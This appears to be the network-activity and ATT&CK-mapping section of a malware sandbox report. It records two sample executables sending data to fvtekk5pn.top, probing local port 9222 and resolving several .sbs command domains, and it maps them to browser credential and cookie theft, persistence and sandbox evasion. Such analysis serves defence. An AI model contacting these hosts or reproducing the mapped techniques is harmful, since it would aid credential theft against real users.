8.9kB
20
17

HTTP Request

GET https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
127.0.0.1:49361

firefox.exe
127.0.0.1:49369

firefox.exe
172.217.169.78:443

www.youtube.com

tls, http2

firefox.exe

1.4kB
7.7kB
13
10
172.217.169.78:443

www.youtube.com

tls, http2

firefox.exe

1.6kB
8.8kB
13
11
216.58.201.110:443

consent.youtube.com

tls, http2

firefox.exe

1.9kB
7.8kB
14
14
216.58.201.110:443

https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1

tls, http2

firefox.exe

2.9kB
64.8kB
31
59

HTTP Request

GET https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
34.116.198.130:80

http://fvtekk5pn.top/v1/upload.php

http

ba9783936d.exe

4.0kB
479 B
9
5

HTTP Request

POST http://fvtekk5pn.top/v1/upload.php

HTTP Response

200
172.217.16.228:443

https://www.google.com/favicon.ico

tls, http2

firefox.exe

2.0kB
7.4kB
17
15

HTTP Request

GET https://www.google.com/favicon.ico
172.217.16.228:443

www.google.com

chrome.exe

52 B
1
172.217.16.228:443

https://www.google.com/async/newtab_promos

tls, http2

chrome.exe

1.9kB
8.5kB
17
19

HTTP Request

GET https://www.google.com/async/ddljson?async=ntp:2

HTTP Request

GET https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0

HTTP Request

GET https://www.google.com/async/newtab_promos
172.217.16.228:443

www.google.com

tls

chrome.exe

907 B
4.6kB
7
7
34.116.198.130:80

http://fvtekk5pn.top/v1/upload.php

http

ba9783936d.exe

25.6kB
643 B
24
9

HTTP Request

POST http://fvtekk5pn.top/v1/upload.php

HTTP Response

200
88.221.134.209:80

http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip

http

firefox.exe

3.7kB
467.4kB
74
346

HTTP Request

GET http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip

HTTP Response

200
172.217.169.46:443

redirector.gvt1.com

tls

firefox.exe

1.6kB
8.8kB
16
19
173.194.182.73:443

r4---sn-4g5e6ns7.gvt1.com

tls

firefox.exe

12.9kB
1.8MB
261
1294
142.250.187.206:443

https://play.google.com/log?hasfast=true&authuser=0&format=json

tls, http2

firefox.exe

2.7kB
8.7kB
17
21

HTTP Request

POST https://play.google.com/log?hasfast=true&authuser=0&format=json
216.58.201.110:443

consent.youtube.com

tls

firefox.exe

1.3kB
1.2kB
8
8
127.0.0.1:9222

ba9783936d.exe
127.0.0.1:9222

ba9783936d.exe

8.8.8.8:53

home.fvtekk5pn.top

dns

ba9783936d.exe

174 B
226 B
2
2

DNS Request

home.fvtekk5pn.top

DNS Request

home.fvtekk5pn.top

DNS Response

34.116.198.130
8.8.8.8:53

property-imper.sbs

dns

72c1b8c8ee.exe

64 B
129 B
1
1

DNS Request

property-imper.sbs
8.8.8.8:53

frogs-severz.sbs

dns

72c1b8c8ee.exe

62 B
127 B
1
1

DNS Request

frogs-severz.sbs
8.8.8.8:53

occupy-blushi.sbs

dns

72c1b8c8ee.exe

63 B
95 B
1
1

DNS Request

occupy-blushi.sbs

DNS Response

104.21.7.169

172.67.187.240
8.8.8.8:53

blade-govern.sbs

dns

72c1b8c8ee.exe

62 B
94 B
1
1

DNS Request

blade-govern.sbs

DNS Response

172.67.153.209

104.21.80.208
8.8.8.8:53

story-tense-faz.sbs

dns

72c1b8c8ee.exe

65 B
97 B
1
1

DNS Request

story-tense-faz.sbs

DNS Response

104.21.1.25

172.67.151.225
8.8.8.8:53

leg-sate-boat.sbs

dns

72c1b8c8ee.exe

63 B
128 B
1
1

DNS Request

leg-sate-boat.sbs
8.8.8.8:53

disobey-curly.sbs

dns

72c1b8c8ee.exe

63 B
95 B
1
1

DNS Request

disobey-curly.sbs

DNS Response

172.67.223.140

104.21.70.128
8.8.8.8:53

motion-treesz.sbs

dns

72c1b8c8ee.exe

63 B
95 B
1
1

DNS Request

motion-treesz.sbs

DNS Response

104.21.94.231

172.67.141.76
8.8.8.8:53

powerful-avoids.sbs

dns

72c1b8c8ee.exe

65 B
97 B
1
1

DNS Request

powerful-avoids.sbs

DNS Response

104.21.19.173

172.67.187.4
8.8.8.8:53

steamcommunity.com

dns

72c1b8c8ee.exe

64 B
80 B
1
1

DNS Request

steamcommunity.com

DNS Response

2.22.99.85
8.8.8.8:53

marshal-zhukov.com

dns

72c1b8c8ee.exe

64 B
96 B
1
1

DNS Request

marshal-zhukov.com

DNS Response

172.67.160.80

104.21.82.174
8.8.8.8:53

fvtekk5pn.top

dns

ba9783936d.exe

164 B
216 B
2
2

DNS Request

fvtekk5pn.top

DNS Request

fvtekk5pn.top

DNS Response

34.116.198.130
8.8.8.8:53

youtube.com

dns

firefox.exe

114 B
73 B
2
1

DNS Request

youtube.com

DNS Request

youtube.com

DNS Response

172.217.169.78
8.8.8.8:53

spocs.getpocket.com

dns

firefox.exe

65 B
131 B
1
1

DNS Request

spocs.getpocket.com

DNS Response

34.117.188.166
8.8.8.8:53

getpocket.cdn.mozilla.net

dns

firefox.exe

71 B
174 B
1
1

DNS Request

getpocket.cdn.mozilla.net

DNS Response

34.120.5.221
8.8.8.8:53

prod.ads.prod.webservices.mozgcp.net

dns

firefox.exe

164 B
98 B
2
1

DNS Request

prod.ads.prod.webservices.mozgcp.net

DNS Request

prod.ads.prod.webservices.mozgcp.net

DNS Response

34.117.188.166
8.8.8.8:53

prod.pocket.prod.cloudops.mozgcp.net

dns

firefox.exe

164 B
98 B
2
1

DNS Request

prod.pocket.prod.cloudops.mozgcp.net

DNS Request

prod.pocket.prod.cloudops.mozgcp.net

DNS Response

34.120.5.221
8.8.8.8:53

prod.content-signature-chains.prod.webservices.mozgcp.net

dns

firefox.exe

103 B
119 B
1
1

DNS Request

prod.content-signature-chains.prod.webservices.mozgcp.net

DNS Response

34.160.144.191
8.8.8.8:53

prod.content-signature-chains.prod.webservices.mozgcp.net

dns

firefox.exe

103 B
131 B
1
1

DNS Request

prod.content-signature-chains.prod.webservices.mozgcp.net

DNS Response

2600:1901:0:92a9::
8.8.8.8:53

firefox-settings-attachments.cdn.mozilla.net

dns

firefox.exe

90 B
177 B
1
1

DNS Request

firefox-settings-attachments.cdn.mozilla.net

DNS Response

34.117.121.53
8.8.8.8:53

prod.ads.prod.webservices.mozgcp.net

dns

firefox.exe

82 B
175 B
1
1

DNS Request

prod.ads.prod.webservices.mozgcp.net
8.8.8.8:53

prod.pocket.prod.cloudops.mozgcp.net

dns

firefox.exe

82 B
110 B
1
1

DNS Request

prod.pocket.prod.cloudops.mozgcp.net

DNS Response

2600:1901:0:524c::
8.8.8.8:53

prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

94 B
110 B
1
1

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net

DNS Response

34.149.100.209
8.8.8.8:53

attachments.prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

106 B
122 B
1
1

DNS Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net

DNS Response

34.117.121.53
8.8.8.8:53

prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

94 B
187 B
1
1

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net
8.8.8.8:53

attachments.prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

106 B
199 B
1
1

DNS Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net
8.8.8.8:53

youtube.com

dns

firefox.exe

57 B
73 B
1
1

DNS Request

youtube.com

DNS Response

172.217.169.78
8.8.8.8:53

youtube.com

dns

firefox.exe

57 B
85 B
1
1

DNS Request

youtube.com

DNS Response

2a00:1450:4009:819::200e
8.8.8.8:53

shavar.prod.mozaws.net

dns

firefox.exe

68 B
116 B
1
1

DNS Request

shavar.prod.mozaws.net

DNS Response

52.32.237.164

52.27.142.243

34.209.229.249
8.8.8.8:53

shavar.prod.mozaws.net

dns

firefox.exe

204 B
153 B
3
1

DNS Request

shavar.prod.mozaws.net

DNS Request

shavar.prod.mozaws.net

DNS Request

shavar.prod.mozaws.net
172.217.169.78:443

youtube.com

https

firefox.exe

7.2kB
15.4kB
38
21
8.8.8.8:53

www.youtube.com

dns

firefox.exe

183 B
319 B
3
1

DNS Request

www.youtube.com

DNS Request

www.youtube.com

DNS Request

www.youtube.com

DNS Response

172.217.169.78

142.250.180.14

172.217.16.238

142.250.179.238

142.250.187.238

216.58.204.78

142.250.187.206

142.250.200.14

216.58.212.206

172.217.169.46

142.250.200.46

216.58.201.110

142.250.178.14

216.58.212.238
8.8.8.8:53

youtube-ui.l.google.com

dns

firefox.exe

345 B
293 B
5
1

DNS Request

youtube-ui.l.google.com

DNS Request

youtube-ui.l.google.com

DNS Request

youtube-ui.l.google.com

DNS Request

youtube-ui.l.google.com

DNS Request

youtube-ui.l.google.com

DNS Response

216.58.212.206

216.58.212.238

172.217.169.46

172.217.169.78

142.250.180.14

142.250.178.14

172.217.16.238

216.58.201.110

142.250.200.46

142.250.200.14

216.58.204.78

142.250.187.206

142.250.187.238

142.250.179.238
172.217.169.78:443

youtube-ui.l.google.com

https

firefox.exe

7.8kB
19.1kB
33
18
8.8.8.8:53

consent.youtube.com

dns

firefox.exe

65 B
81 B
1
1

DNS Request

consent.youtube.com

DNS Response

216.58.201.110
8.8.8.8:53

consent.youtube.com

dns

firefox.exe

130 B
81 B
2
1

DNS Request

consent.youtube.com

DNS Request

consent.youtube.com

DNS Response

216.58.201.110
8.8.8.8:53

consent.youtube.com

dns

firefox.exe

130 B
93 B
2
1

DNS Request

consent.youtube.com

DNS Request

consent.youtube.com

DNS Response

2a00:1450:4009:826::200e
8.8.8.8:53

fvtekk5pn.top

dns

ba9783936d.exe

164 B
216 B
2
2

DNS Request

fvtekk5pn.top

DNS Request

fvtekk5pn.top

DNS Response

34.116.198.130
216.58.201.110:443

consent.youtube.com

https

firefox.exe

6.4kB
11.9kB
19
17
8.8.8.8:53

youtube-ui.l.google.com

dns

firefox.exe

69 B
181 B
1
1

DNS Request

youtube-ui.l.google.com

DNS Response

2a00:1450:4009:827::200e

2a00:1450:4009:818::200e

2a00:1450:4009:80b::200e

2a00:1450:4009:80a::200e
8.8.8.8:53

www.google.com

dns

chrome.exe

120 B
76 B
2
1

DNS Request

www.google.com

DNS Request

www.google.com

DNS Response

172.217.16.228
8.8.8.8:53

www.google.com

dns

chrome.exe

60 B
76 B
1
1

DNS Request

www.google.com

DNS Response

172.217.16.228
8.8.8.8:53

www.google.com

dns

chrome.exe

60 B
88 B
1
1

DNS Request

www.google.com

DNS Response

2a00:1450:4009:821::2004
172.217.16.228:443

www.google.com

https

firefox.exe

10.3kB
13.6kB
15
13
8.8.8.8:53

consent.youtube.com

dns

firefox.exe

260 B
81 B
4
1

DNS Request

consent.youtube.com

DNS Request

consent.youtube.com

DNS Request

consent.youtube.com

DNS Request

consent.youtube.com

DNS Response

216.58.201.110
8.8.8.8:53

consent.youtube.com

dns

firefox.exe

65 B
81 B
1
1

DNS Request

consent.youtube.com

DNS Response

216.58.201.110
172.217.16.228:443

www.google.com

https

chrome.exe

1.3kB
3.8kB
1
3
8.8.8.8:53

fvtekk5pn.top

dns

ba9783936d.exe

164 B
216 B
2
2

DNS Request

fvtekk5pn.top

DNS Request

fvtekk5pn.top

DNS Response

34.116.198.130
8.8.8.8:53

prod.balrog.prod.cloudops.mozgcp.net

dns

firefox.exe

82 B
98 B
1
1

DNS Request

prod.balrog.prod.cloudops.mozgcp.net

DNS Response

35.244.181.201
8.8.8.8:53

prod.balrog.prod.cloudops.mozgcp.net

dns

firefox.exe

82 B
175 B
1
1

DNS Request

prod.balrog.prod.cloudops.mozgcp.net
8.8.8.8:53

ciscobinary.openh264.org

dns

firefox.exe

70 B
286 B
1
1

DNS Request

ciscobinary.openh264.org

DNS Response

88.221.134.209

88.221.134.155
8.8.8.8:53

a19.dscg10.akamai.net

dns

firefox.exe

67 B
99 B
1
1

DNS Request

a19.dscg10.akamai.net

DNS Response

88.221.134.209

88.221.134.155
8.8.8.8:53

a19.dscg10.akamai.net

dns

firefox.exe

67 B
123 B
1
1

DNS Request

a19.dscg10.akamai.net

DNS Response

2a02:26f0:a1::58dd:869b

2a02:26f0:a1::58dd:86d1
8.8.8.8:53

redirector.gvt1.com

dns

firefox.exe

65 B
81 B
1
1

DNS Request

redirector.gvt1.com

DNS Response

172.217.169.46
8.8.8.8:53

redirector.gvt1.com

dns

firefox.exe

65 B
81 B
1
1

DNS Request

redirector.gvt1.com

DNS Response

172.217.169.46
8.8.8.8:53

redirector.gvt1.com

dns

firefox.exe

65 B
93 B
1
1

DNS Request

redirector.gvt1.com

DNS Response

2a00:1450:4009:818::200e
172.217.169.46:443

redirector.gvt1.com

https

firefox.exe

3.3kB
9.3kB
8
10
8.8.8.8:53

r4---sn-4g5e6ns7.gvt1.com

dns

firefox.exe

71 B
116 B
1
1

DNS Request

r4---sn-4g5e6ns7.gvt1.com

DNS Response

173.194.182.73
8.8.8.8:53

r4.sn-4g5e6ns7.gvt1.com

dns

firefox.exe

69 B
85 B
1
1

DNS Request

r4.sn-4g5e6ns7.gvt1.com

DNS Response

173.194.182.73
8.8.8.8:53

r4.sn-4g5e6ns7.gvt1.com

dns

firefox.exe

69 B
97 B
1
1

DNS Request

r4.sn-4g5e6ns7.gvt1.com

DNS Response

2a00:1450:4001:5c::9
173.194.182.73:443

r4.sn-4g5e6ns7.gvt1.com

https

firefox.exe

1.8kB
5.9kB
5
7
8.8.8.8:53

play.google.com

dns

firefox.exe

61 B
77 B
1
1

DNS Request

play.google.com

DNS Response

142.250.187.206
8.8.8.8:53

play.google.com

dns

firefox.exe

61 B
77 B
1
1

DNS Request

play.google.com

DNS Response

142.250.187.206
8.8.8.8:53

play.google.com

dns

firefox.exe

61 B
89 B
1
1

DNS Request

play.google.com

DNS Response

2a00:1450:4009:81f::200e
142.250.187.206:443

play.google.com

https

firefox.exe

3.3kB
9.3kB
9
10
8.8.8.8:53

consent.youtube.com

dns

firefox.exe

65 B
81 B
1
1

DNS Request

consent.youtube.com

DNS Response

216.58.201.110
8.8.8.8:53

consent.youtube.com

dns

firefox.exe

65 B
81 B
1
1

DNS Request

consent.youtube.com

DNS Response

216.58.201.110
216.58.201.110:443

consent.youtube.com

https

firefox.exe

2.3kB
3.4kB
4
8
127.0.0.1:65269

ba9783936d.exe

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Modify Authentication Process

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Authentication Process

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion